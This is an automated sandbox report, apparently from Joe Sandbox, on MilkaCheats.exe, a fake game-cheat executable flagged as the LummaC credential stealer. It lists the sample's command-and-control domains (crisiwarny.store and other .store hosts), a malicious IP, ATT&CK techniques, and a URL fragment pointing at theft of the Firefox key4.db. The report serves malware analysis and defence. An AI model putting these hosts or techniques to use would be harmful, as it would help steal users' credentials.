              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\MilkaCheats.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: Yara matchFile source: 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: MilkaCheats.exe PID: 6428, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MilkaCheats.exe PID: 6428, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              111
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)111
              Process Injection
              Security Account Manager151
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information
              NTDS12
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials12
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync33
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MilkaCheats.exe100%AviraHEUR/AGEN.1311191
              MilkaCheats.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              crisiwarny.store
              172.67.170.64
              truetrue
                unknown
                messejawu.store
                unknown
                unknowntrue
                  unknown
                  presticitpo.store
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    presticitpo.storetrue
                      unknown
                      scriptyprefej.storetrue
                        unknown
                        https://crisiwarny.store/apitrue
                          unknown
                          necklacedmny.storetrue
                            unknown
                            fadehairucw.storetrue
                              unknown
                              messejawu.storetrue
                                unknown
                                navygenerayk.storetrue
                                  unknown
                                  founpiuer.storetrue
                                    unknown
                                    thumbystriw.storetrue
                                      unknown
                                      crisiwarny.storetrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabMilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgMilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoMilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://crisiwarny.store/eMilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794077852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1835884206.000000000136C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://crisiwarny.store/apihCbMilkaCheats.exe, 00000001.00000003.1847808450.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1802215575.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848584862.0000000001361000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://crisiwarny.store:443/apiPackagesMilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://crisiwarny.store/OMilkaCheats.exe, 00000001.00000002.1848284074.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1847565217.00000000012E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaMilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://upx.sf.netAmcache.hve.4.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ocsp.rootca1.amazontrust.com0:MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MilkaCheats.exe, 00000001.00000003.1712448019.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712503562.0000000003A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://crisiwarny.store/s:mdMilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1835884206.000000000136C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://www.ecosia.org/newtab/MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://crisiwarny.store/rjmMilkaCheats.exe, 00000001.00000003.1767891806.000000000136C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://crisiwarny.store:443/apiMilkaCheats.exe, MilkaCheats.exe, 00000001.00000003.1847808450.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1802215575.0000000001361000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1726270504.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794321232.0000000001360000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1794077852.000000000135F000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1778356922.000000000135E000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1778286668.0000000001358000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1768149959.0000000001342000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000002.1848584862.0000000001361000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgMilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiMilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://x1.c.lencr.org/0MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://x1.i.lencr.org/0MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://crisiwarny.store/BmMilkaCheats.exe, 00000001.00000003.1802442318.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1835884206.000000000136C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallMilkaCheats.exe, 00000001.00000003.1712503562.0000000003A02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://support.microsofMilkaCheats.exe, 00000001.00000003.1712448019.0000000003A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?MilkaCheats.exe, 00000001.00000003.1750036260.0000000003A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://crisiwarny.store:443/api2o4p.default-release/key4.dbPKMilkaCheats.exe, 00000001.00000003.1767891806.000000000136C000.00000004.00000020.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1778631917.000000000136C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://crisiwarny.store/MilkaCheats.exe, 00000001.00000003.1847565217.00000000012E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesMilkaCheats.exe, 00000001.00000003.1712503562.0000000003A02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allMilkaCheats.exe, 00000001.00000003.1750884533.0000000003AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MilkaCheats.exe, 00000001.00000003.1712714034.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712657900.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, MilkaCheats.exe, 00000001.00000003.1712792463.0000000003A19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94MilkaCheats.exe, 00000001.00000003.1751292403.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        172.67.170.64
                                                                        crisiwarny.storeUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1543311
                                                                        Start date and time:2024-10-27 16:44:06 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 45s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:9
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:MilkaCheats.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/6@3/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 77%
                                                                        • Number of executed functions: 8
                                                                        • Number of non-executed functions: 142
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target MilkaCheats.exe, PID 6428 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: MilkaCheats.exe
                                                                        TimeTypeDescription
                                                                        11:44:57API Interceptor9x Sleep call for process: MilkaCheats.exe modified
                                                                        11:45:15API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        172.67.170.64file.exeGet hashmaliciousLummaCBrowse
                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            crisiwarny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                            • 104.21.95.91
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                            • 104.21.95.91
                                                                                            17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                                                                                            • 104.21.44.95
                                                                                            17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                                                                                            • 172.67.198.131
                                                                                            care.rtfGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.43.157
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            na.docGet hashmaliciousMassLogger RATBrowse
                                                                                            • 188.114.96.3
                                                                                            na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.95.91
                                                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.170.64
                                                                                            No context
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.7129085719177475
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:yWFnVToA55svtfoI7RT6tQXIDcQvc6QcEVcw3cE/H+HbHg/8BRTf3Oy1FhZAX/dd:99RX55y0BU/Aju1zuiF+Z24IO8H
                                                                                            MD5:E7E58F7E7D20E2D5495FAB587B91B753
                                                                                            SHA1:2CCF52F2597E7096EB49A7C127148913273484AE
                                                                                            SHA-256:5D178FBEE9A7FB39D90B4CC881DCF8473F099A9E61521C13E3B8CF6EEC9E837E
                                                                                            SHA-512:5C02E46C831A3F29D8200AD2BAD7E58DD86605878B1768245BFF51B5AE9DA7AE34C989CCC808F7089EE39F53B7C768E3669578B7CEFEAB5AB78D9ACF4F212DA2
                                                                                            Malicious:true
                                                                                            Reputation:low
